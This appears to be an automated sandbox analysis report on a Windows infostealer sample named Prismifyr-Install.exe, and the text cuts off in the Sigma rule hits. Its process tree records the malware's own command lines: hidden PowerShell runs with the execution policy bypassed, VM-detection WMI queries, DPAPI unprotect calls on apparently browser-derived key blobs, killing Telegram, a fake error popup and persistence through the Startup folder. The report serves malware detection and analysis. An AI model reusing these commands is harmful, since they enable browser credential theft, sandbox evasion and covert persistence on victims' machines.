Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Prismifyr-Install.exe

Overview

General Information

Sample name:Prismifyr-Install.exe
Analysis ID:1523536
MD5:96d6158a2ea98333a66b0505dfb4a95a
SHA1:a598bb3dc9498aa62750b620bb768db4a98d8c78
SHA256:ea2cac9b5dfd6ffcf473ebe646abf512a33b27acefcc470799adb02698f256e7
Infos:

Detection

Node Stealer
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Node Stealer
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Detected generic credential text file
Drops PE files to the startup folder
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • Prismifyr-Install.exe (PID: 1172 cmdline: "C:\Users\user\Desktop\Prismifyr-Install.exe" MD5: 96D6158A2EA98333A66B0505DFB4A95A)
    • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6004 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3564 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 6456 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 5772 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5D70.tmp" "c:\Users\user\AppData\Local\Temp\1d1qdkxo\CSC52BD52076B74273B09B644FAD90AB4F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • cmd.exe (PID: 5512 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 4940 cmdline: curl http://api.ipify.org/ --ssl-no-revoke MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 4880 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 2220 cmdline: wmic bios get smbiosbiosversion MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 3472 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 1576 cmdline: wmic MemoryChip get /format:list MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
      • find.exe (PID: 6788 cmdline: find /i "Speed" MD5: AE3F3DC3ED900F2A582BAD86A764508C)
    • cmd.exe (PID: 4368 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 5728 cmdline: wmic path win32_VideoController get name MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 5896 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6456 cmdline: powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 6188 cmdline: tasklist /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 4348 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4876 cmdline: powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2928 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 7588 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 4700 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5888 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4872 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6824 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6448 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 4268 cmdline: taskkill /IM Telegram.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 2220 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 8140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2DC.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSC4B6917784BAC4B77A38513830EABEA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • screenCapture_1.3.2.exe (PID: 5832 cmdline: screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" MD5: 17FE7B96469646C36413F4B80862DE02)
    • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1256 cmdline: cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • mshta.exe (PID: 8120 cmdline: mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • cmd.exe (PID: 5936 cmdline: C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 3024 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • Prismifyr-Install.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe" MD5: 96D6158A2EA98333A66B0505DFB4A95A)
    • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2448 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 4928 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mydyhibp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 6196 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES25A2.tmp" "c:\Users\user\AppData\Local\Temp\CSCDBB13EE0A1FC4822925E9A81EA23E611.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • cmd.exe (PID: 3324 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 8032 cmdline: curl http://api.ipify.org/ --ssl-no-revoke MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 1700 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 6260 cmdline: wmic bios get smbiosbiosversion MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 4324 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 1552 cmdline: wmic MemoryChip get /format:list MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
      • find.exe (PID: 4308 cmdline: find /i "Speed" MD5: AE3F3DC3ED900F2A582BAD86A764508C)
    • cmd.exe (PID: 7204 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 2332 cmdline: wmic path win32_VideoController get name MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 7160 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2120 cmdline: powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6760 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 5288 cmdline: tasklist /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 4896 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7192 cmdline: powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4120 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 5740 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 5904 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6456 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5668 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6664 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7016 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 3048 cmdline: taskkill /IM Telegram.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5676 cmdline: C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • screenCapture_1.3.2.exe (PID: 3612 cmdline: screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-7716-19tt98d.qpv5.png" MD5: 17FE7B96469646C36413F4B80862DE02)
    • cmd.exe (PID: 3024 cmdline: C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6060 cmdline: cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • mshta.exe (PID: 4204 cmdline: mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 4460 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 5068 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeJoeSecurity_NodeStealer_1Yara detected Node StealerJoe Security
      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1", CommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6004, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1", ProcessId: 3564, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3564, ParentProcessName: 